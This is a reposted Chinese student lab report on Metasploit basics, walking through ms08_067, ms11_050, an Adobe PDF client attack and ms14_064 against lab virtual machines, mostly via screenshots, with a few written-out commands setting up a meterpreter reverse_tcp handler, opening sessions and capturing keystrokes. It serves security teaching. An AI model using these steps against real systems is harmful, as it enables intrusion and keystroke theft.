20145305 《网络对抗》MSF基础应用

最新推荐文章于 2024-08-10 19:22:46 发布
最新推荐文章于 2024-08-10 19:22:46 发布
阅读量96 收藏
点赞数
文章标签: shell 运维 操作系统
原文链接:http://www.cnblogs.com/summerharper/p/6696650.html
版权

实践过程及结果截图

主动攻击ms08_067

Kali的IP:10.43.46.93

885619-20170411211427454-1087865982.jpg

靶机的IP:10.43.49.28

885619-20170411211826688-319364037.jpg

MS08_067远程漏洞攻击实践:Shell

885619-20170411212029360-1968902859.jpg

885619-20170411212125516-893639893.jpg

攻击成功的结果

885619-20170411212158235-1504279593.jpg

在kali上执行ipconfig/all得到如下图所示

885619-20170411212245422-2091994547.jpg

在win xp上执行同样的命令,如下图所示

885619-20170411212312407-456323960.jpg

MS08_067远程漏洞攻击实践:meterpreter

885619-20170411212444547-17734584.jpg

885619-20170411212456001-747253817.jpg

885619-20170411212510954-1738528963.jpg

成功攻击结果

885619-20170411212546297-1304209340.jpg

执行ifconfig,查看靶机地址

885619-20170411212612876-2095292079.jpg

ps查看进程

885619-20170411212639985-25858702.jpg

meterpreter转shell

885619-20170411212701751-866804671.jpg

针对浏览器的攻击ms11_050

Kali的IP:10.43.46.93

885619-20170411212901172-945458239.jpg

靶机的IP:10.43.55.130

885619-20170411212955501-1346073169.jpg

885619-20170411213039266-1182225514.jpg

885619-20170411213134579-465168841.jpg

exploit如下图所示,有靶机需要访问的ip地址

885619-20170411213209282-558412351.jpg

在靶机IE上输入网址,并在靶机上查看信息

885619-20170411213258672-1841589617.jpg

kali中显示一个session 1已经创建

885619-20170411213339985-1928938430.jpg

输入命令sessions -i 1,开始连接

885619-20170411213418172-1978099236.jpg

已经攻击成功了,开始按键抓取

885619-20170411213443172-2135020195.jpg

获取shell

885619-20170411213503344-1970400832.jpg

针对客户端的攻击Adobe

Kali的IP:10.43.46.93

885619-20170411213643313-2097146149.jpg

靶机的IP:10.43.41.183

885619-20170411213726219-429440153.jpg

885619-20170411213915251-1737727242.jpg

885619-20170411213933251-1133857798.jpg

输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里

使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块

使用set payload windws/meterpreter/reverse_tcp建立一个反向连接

输入命令set LPORT 5305和攻击模块里的数据设置为一样的

885619-20170411214153813-480017690.jpg

885619-20170411214349938-1609690918.jpg

使用命令exploit开始攻击,在xp中打开pdf

885619-20170411214403954-1418093082.jpg

成功应用任何一个辅助模块ms14_064

Kali的IP:10.43.46.93

885619-20170411214732969-516277381.jpg

靶机(Win7_64位)的IP:10.43.35.204

885619-20170411214808422-986244479.jpg

远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本…

msf里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_execution

输入命令search ms14,会显示出找到的渗透模块

885619-20170411215325704-90009945.jpg

输入命令,进入该漏洞模块的使用

使用命令设置攻击有效载荷

885619-20170411215519110-1027320036.jpg

输入命令show options显示我们需要在攻击前需要设置的数据

885619-20170411215556188-1724309293.jpg

AllowPowershellPrompt的属性默认为false 需要设置为true ,因为msf中自带的漏洞利用调用的是powershell,所以msf中的代码只对安装powershell的系统生效,win7系统安装自带powershell

所以这里测试受害的机器为windows7_64位.IE8.按照图中各个属性配置好后,执行exploit即可

885619-20170411215941126-497489598.jpg

885619-20170411220003251-565593890.jpg

885619-20170411220023657-334502978.jpg

得到一个URL地址,复制到受害者机器(win7)测试

885619-20170411220222454-1875757954.jpg

可以看见这边反弹了一个shell,接下里我们就可以随便玩了

885619-20170411220315532-1938067322.jpg

885619-20170411220339938-1416184310.jpg

885619-20170411220358063-812603094.jpg

885619-20170411220415079-1492898698.jpg

测试成功,结束

基础问题回答

(1)用自己的话解释什么是exploit,payload,encode.

exploit就是一段通过触发一个漏洞(或者几个漏洞)进而控制目标系统的代码

攻击代码通常会释放攻击载荷payload,里面包含了攻击者想要执行的代码。这个代码就是我们通常所说的shellcode,传统上,这段代码用来启动系统上的一个shell(比如,获得一个命令行接口),如今,shellcode几乎可以做任何事情了

encode就是用来进行编码加密

实践总结与体会

我的天,做这周的实践开了五个虚拟机,重点是对于性能不好,开两个虚拟机卡的要死的我很崩溃,用了这么久做实践,大部分时间都用在了等待电脑卡机反应的过程中,心好累,

而且有时候在做完了Kali竟然自己重启了,没截图的我很心痛,又重新做了一遍,还要假装微笑

转载于:https://www.cnblogs.com/summerharper/p/6696650.html

weixin_30492601
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通信与网络中的MSF基于组件的业务框架
11-14
**MSF基于组件的业务框架概述** ...总结来说,MSF基于组件的业务框架提供了一种结构化的方法来设计和实施通信与网络服务,通过模块化和标准化,使得业务开发更加高效,同时也为未来的业务创新和升级提供了强大的基础
PowerShell 中激活anaconda的虚拟python环境
热门推荐
shiren8538的博客
07-05 2万+
win10 系统下,安装python,通常选择anaconda,也会面临使用PowerShell的情况,但是Power Shell和anaconda的虚拟环境不配合,无法激活。在anaconda中创建虚拟python环境:conda create -n env_name python=x.x在anaconda prompt 和 cmd中,激活方法如下:activate env_name但在Powe...
anaconda中powershell prompt工具包的使用
qq_35837578的博客
08-01 1万+
忙着查操作的同学,请直接往下看,看到有一列#######################那里就可以了。 在Python的机器学习,数据科学,网页前后端开发以及科学计算等工作中,经常遇到一个非常麻烦的问题就是如何去管理各种各样的package,尤其是不同的package之间是有可能互相冲突的。另外,某些包也会受到计算机本身软件或者硬件环境的影响。因此,在这种情况下,引入合适的包管理系统就十分...
kali linux 2.0入侵windiws7系统 ------ms14-064漏洞
边城浪子的博客
08-07 3064
漏洞介绍: Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术, 远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本... metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_execu...
PowerShellPrompt 显示 Git 分支
aggresss
01-03 1847
PowerShell 环境 Prompt 显示 Git 分支
20165101刘天野 2018-2019-2《网络对抗技术》Exp5 MSF基础应用
weixin_30670965的博客
04-21 122
目录 20165101刘天野 2018-2019-2《网络对抗技术》Exp5 MSF基础应用 1. 实践内容 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050;(1分) 1.3 一个针对客户端的攻击,如Adobe;(1分) ...
msf简单运用基础
12-16
文中通过ping命令验证了网络连通性,这是进行后续渗透测试的基础。 ### 二、MSF框架的初步使用 #### 1. 扫描目标系统 - **db_nmap**: 这是MSF中调用Nmap工具的一种方式,用于获取目标主机的操作系统类型、开放端口...
70-70.渗透测试-kali更新msf.mp4
05-10
70-70.渗透测试-kali更新msf.mp4
71-71.渗透测试-Windows安装msf.mp4
05-10
71-71.渗透测试-Windows安装msf.mp4
73-73.渗透测试-MSF目录结构.mp4
05-10
73-73.渗透测试-MSF目录结构.mp4
UnixBench分数计算与多进程测试
qq_39280836的博客
08-08 186
在支持较好的测试机上直接运行RUN脚本即可得到测试结果。
Linux Shell编程--脚本运行与变量置换
小李学不完的博客
08-08 889
Shell脚本运行、修改权限不管脚本有没有x(可执行)权限,都可以执行、sh脚本的绝对路径执行脚本、 bash 脚本的相对路径执行脚本、bash 脚本的绝对路径执行脚本、脚本的绝对路径/相对路径(需要脚本的+x权限)、脚本的相对路径执行脚本可以发现,执行./hello.sh需要x权限】、收回权限再次使用绝对路径执行脚本、source脚本的绝对路径/相对路径执行脚本source执行脚本时,不管脚本有没有x(可执行权限
shell编程练习(三)
2301_77279557的博客
08-08 241
常见的shell编程以及自动化脚本
DC-7靶机渗透测试
m0_66225311的博客
08-06 818
依旧是远古靶机,尝试又做了一做,用了一些不同样的方法将其再次攻破,这次主要学习了一下Drush 命令,用于重置 Drupal 网站中特定用户(通常是管理员用户)的密码为指定的新密码。这个获取后台登陆密码的方式太过新奇了,不好好查询资料,即使好好查或许也不一定能查得到。记住了这个知识点了,万一域渗透就用到了呢,用户横向移动到另外一台靶机,发现就是Drupal 网站,直接重置密码。查看文件也能获取一些定时任务的蛛丝马迹。
Linux Shell编程--数组
小李学不完的博客
08-09 154
Shell 脚本中的数组允许你存储多个,并可以通过索引访问它们。Shell 中的数组是一维的。Shell中的数组虽然功能有限,但通过一些技巧和方法,仍然可以有效地进行数组操作和处理。
win设置exe程序自启动
半两八斤的博客
08-07 193
windows系统设置exe程序开机自启动
FTP.JBoss,Ldap,Rsync未授权访问漏洞(附带修复方法)
C233333235的博客
08-10 609
FTP 弱⼝令或匿名登录漏洞,⼀般指使⽤ FTP 的⽤户启⽤了匿名登录功能,或系统⼝令的⻓度太短、复杂度不够、仅包含数字、或仅包含字⺟等,容易被⿊客攻击,发⽣恶意⽂件上传或更严重的⼊侵⾏为。
DriftingBlues2靶机渗透测试
最新发布
m0_66225311的博客
08-10 335
又是每天一部远古靶机,最近在打hackmyvm上的靶机,这些个一年前做的靶机想着回顾一下吧,本次是DriftingBlues系列第二部,整体难度偏简单,适合入门吧,也是能学到一些东西的。第一次基础ssh私钥登录的知识还是第一次打这个靶机的时候了,一年多前了吧,刚刚开始打靶机
zsh 配置 docker 自动补全
翡翠泪滴的博客
08-06 410
在终端中使用 docker 的命令的时候必须要全部手敲,没有提示,于是就在找是否有自动补全的脚本,搜索了一圈踩了一些坑总结了一下具体的步骤。注意这里下载的文件是 _docker 不是 _docker-compose,下错了就还是用不了,好多教程都是下的后者。然后重启 shell 或者 source 一下即可。然后将如下两条命令加到 .zshrc 中去。
MSF基础与团队模型详解:原则、应用与CMMI比较
在实际课程中,MSF的培训通常会通过案例研究、讨论和实践活动来深入讲解这些概念,并鼓励参与者将理论应用到实际工作中。通过讨论,学员可以理解一个优秀的项目团队应具备的特点,如良好的沟通、明确的目标导向、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值